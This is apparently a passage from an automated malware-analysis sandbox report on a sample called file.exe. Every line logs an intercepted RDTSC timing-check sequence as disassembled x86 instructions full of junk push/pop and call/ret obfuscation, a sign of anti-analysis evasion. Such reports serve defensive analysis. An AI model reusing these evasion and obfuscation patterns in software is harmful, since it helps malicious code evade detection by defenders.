Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3FEE second address: CA3FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3FF4 second address: CA3FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA4305 second address: CA430B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA430B second address: CA4314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA4314 second address: CA431E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA32872BAE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA431E second address: CA4330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA328DF73A8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA4330 second address: CA4334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6A62 second address: CA6A82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6A82 second address: CA6AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA32872BAF1h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d jmp 00007FA32872BAEBh 0x00000012 pop edi 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push ecx 0x00000018 push edi 0x00000019 jmp 00007FA32872BAF0h 0x0000001e pop edi 0x0000001f pop ecx 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 jo 00007FA32872BAE8h 0x00000029 pushad 0x0000002a popad 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e jmp 00007FA32872BAF7h 0x00000033 popad 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jng 00007FA32872BAE8h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6AF4 second address: CA6AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6AF9 second address: CA6AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6BE6 second address: CA6C04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6C04 second address: CA6C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6C0A second address: CA6C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA328DF73ACh 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d je 00007FA328DF73AEh 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6C27 second address: CA6CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007FA32872BAEFh 0x0000000e pop eax 0x0000000f mov ecx, dword ptr [ebp+122D2583h] 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FA32872BAE8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jc 00007FA32872BAEEh 0x00000037 jl 00007FA32872BAE8h 0x0000003d mov dh, CEh 0x0000003f push 00000000h 0x00000041 jc 00007FA32872BAEBh 0x00000047 mov edi, 48BE59EEh 0x0000004c push 00000003h 0x0000004e mov dword ptr [ebp+122D223Ah], edi 0x00000054 call 00007FA32872BAE9h 0x00000059 jmp 00007FA32872BAF6h 0x0000005e push eax 0x0000005f pushad 0x00000060 je 00007FA32872BAE8h 0x00000066 pushad 0x00000067 popad 0x00000068 jmp 00007FA32872BAEDh 0x0000006d popad 0x0000006e mov eax, dword ptr [esp+04h] 0x00000072 jnp 00007FA32872BAFFh 0x00000078 mov eax, dword ptr [eax] 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d pushad 0x0000007e popad 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6CEF second address: CA6CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6CF4 second address: CA6D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jno 00007FA32872BAECh 0x00000014 push ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FA32872BAE8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov edx, dword ptr [ebp+122D3746h] 0x0000003a lea ebx, dword ptr [ebp+1245A9A2h] 0x00000040 push ecx 0x00000041 mov edi, dword ptr [ebp+122D1EC2h] 0x00000047 pop ecx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jnp 00007FA32872BAE8h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6D69 second address: CA6D73 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA328DF73ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6E85 second address: CA6ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 add dword ptr [esp], 1A84E81Dh 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FA32872BAE8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov edx, 7F8591C3h 0x0000002c lea ebx, dword ptr [ebp+1245A9ABh] 0x00000032 movsx esi, cx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FA32872BAF6h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6ED5 second address: CA6EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA328DF73B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6F89 second address: CA6F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6F8E second address: CA6FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jns 00007FA328DF73A6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6FA2 second address: CA6FAC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA32872BAECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6FAC second address: CA6FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FA328DF73AFh 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 je 00007FA328DF73A8h 0x00000018 push eax 0x00000019 pop eax 0x0000001a jo 00007FA328DF73A8h 0x00000020 push edi 0x00000021 pop edi 0x00000022 popad 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a push esi 0x0000002b pop esi 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6FE2 second address: CA6FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC93C9 second address: CC93CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9D687 second address: C9D693 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA32872BAE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9D693 second address: C9D6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jng 00007FA328DF73A6h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC732A second address: CC7349 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA32872BAF9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC7349 second address: CC734E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC734E second address: CC7371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA32872BAE6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FA32872BAE6h 0x00000015 jmp 00007FA32872BAEEh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC7BBE second address: CC7BC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC7FDD second address: CC7FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA32872BAF1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8469 second address: CC846D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD4B8 second address: CBD4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA32872BAEEh 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD4C6 second address: CBD4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FA328DF73B6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FA328DF73A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99F1E second address: C99F2B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA32872BAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8F7C second address: CC8F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCFF2 second address: CCD005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA32872BAE6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FA32872BAE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD005 second address: CCD009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C94F10 second address: C94F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C94F15 second address: C94F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FA328DF73AEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C94F29 second address: C94F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF654 second address: CCF688 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FA328DF73AAh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push edi 0x00000013 jo 00007FA328DF73A6h 0x00000019 pop edi 0x0000001a jns 00007FA328DF73ACh 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 pushad 0x00000027 popad 0x00000028 pop esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF688 second address: CCF68E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF68E second address: CCF692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCE570 second address: CCE57E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCE57E second address: CCE582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF8CD second address: CCF8EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF8EA second address: CCF8F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA328DF73A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD48D7 second address: CD48DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD48DF second address: CD48E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD48E5 second address: CD48EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD48EE second address: CD4912 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA328DF73A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 je 00007FA328DF73A6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b jnp 00007FA328DF73A6h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD4039 second address: CD4069 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA32872BAF7h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jng 00007FA32872BAE6h 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007FA32872BAE6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD4069 second address: CD407C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA328DF73ABh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD407C second address: CD4088 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD4088 second address: CD408C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD41B3 second address: CD41D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jbe 00007FA32872BAE6h 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA32872BAF4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6664 second address: CD6668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6668 second address: CD6674 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FA32872BAE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6674 second address: CD667A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD85E0 second address: CD85EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA32872BAE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8636 second address: CD8699 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 3A2241A8h 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FA328DF73A8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2324h], ebx 0x0000002d call 00007FA328DF73A9h 0x00000032 jne 00007FA328DF73B8h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FA328DF73ACh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8699 second address: CD869D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD869D second address: CD86A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD86A3 second address: CD86B9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA32872BAE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD86B9 second address: CD86FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA328DF73A6h 0x00000009 jmp 00007FA328DF73B7h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007FA328DF73BFh 0x0000001b jmp 00007FA328DF73B9h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD86FF second address: CD871C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FA32872BAE8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD871C second address: CD8721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8C63 second address: CD8C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8D8F second address: CD8D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA651 second address: CDA65B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA32872BAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA4CE second address: CDA4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDA65B second address: CDA683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FA32872BAF4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FA32872BAE6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB6C7 second address: CDB6CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBFC2 second address: CDBFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBFC8 second address: CDBFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD496 second address: CDD4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, dword ptr [ebp+122D1CB7h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FA32872BAE8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a jmp 00007FA32872BAF9h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 je 00007FA32872BAE9h 0x00000038 mov di, dx 0x0000003b pop esi 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jl 00007FA32872BAE8h 0x00000045 push edi 0x00000046 pop edi 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE109A second address: CE10BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA328DF73B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD246 second address: CDD263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA32872BAF1h 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD52 second address: CDDD58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD263 second address: CDD267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDF2FE second address: CDF323 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FA328DF73B9h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE378B second address: CE3791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
